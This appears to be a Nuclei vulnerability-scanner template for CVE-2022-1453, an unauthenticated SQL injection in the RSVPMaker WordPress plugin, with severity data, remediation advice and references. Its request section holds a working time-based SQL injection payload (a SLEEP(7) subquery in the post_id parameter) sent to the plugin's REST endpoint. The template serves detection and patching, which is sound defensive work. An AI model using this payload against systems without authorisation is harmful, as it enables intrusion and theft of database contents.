id: CVE-2022-1453 info: name: RSVPMaker <= 9.2.5 - SQL Injection author: Shivam Kamboj severity: critical description: | The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to missing SQL escaping and parameterization on user supplied data passed to a SQL query in the rsvpmaker-util.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to and including 9.2.5. impact: | Attackers can retrieve sensitive data from the database without authentication, leading to data breach and privacy violations. remediation: | Update to version 9.2.6, or later reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rsvpmaker/rsvpmaker-925-unauthenticated-sql-injection - https://nvd.nist.gov/vuln/detail/CVE-2022-1453 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-1453 epss-score: 0.6074 epss-percentile: 0.9833 cwe-id: CWE-89 metadata: verified: true max-request: 1 tags: cve,cve2022,wordpress,wp,wp-plugin,sqli,rsvpmaker,vkev http: - raw: - | @timeout: 30s GET /wp-json/rsvpmaker/v1/sked/1?post_id=(SELECT%209999%20FROM%20(SELECT(SLEEP(7)))a) HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'duration >= 7' - 'status_code == 200' - 'regex("false$", body)' - 'contains(content_type, "application/json")' condition: and # digest: 4a0a004730450220581b925d13ce50a31de7c3e2fdab8d8a48b04aca7b3c03682b398309ad5e8e700221008c9ed144ed284459694da08e075f0963f5333724914e963eb9a94245f3379d3f:922c64590222798bb761d5b6d8e72950